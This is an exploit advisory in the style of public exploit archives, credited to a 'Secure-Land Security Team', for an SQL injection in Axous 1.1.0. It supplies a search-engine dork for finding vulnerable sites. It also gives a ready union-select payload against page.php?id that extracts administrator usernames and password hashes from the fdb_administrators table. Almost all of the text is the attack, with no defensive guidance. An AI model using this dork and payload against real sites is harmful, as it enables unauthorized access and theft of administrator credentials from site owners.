1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 |
######################################################################################## ## # Exploit Title : Axous 1.1.0 SQL Injection Vulnerabilitiy # ## # Author: Secure-Land Security Team# ## # Discovered By : farbodmahini # ## # Home: Secure-Land.net# ## # Version : All Version# ## # Vendor Link : www.axous.com# ## # Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com # ## # Security Risk : High # ## #DorK : intext:"Powered by Axous 1.1.0"# ## ## ######################################################################################## #Exploit: # # #http://[target]/page.php?id=[SQL] # #[~] SQL : # #page.php?id=-1+union+select+1,group_concat(id,0x3a,username,0x3a,password),3+ #from+fdb_administrators-- # ######################################################################################## ## # Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us# ## ######################################################################################## ## # Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id# ## ######################################################################################## |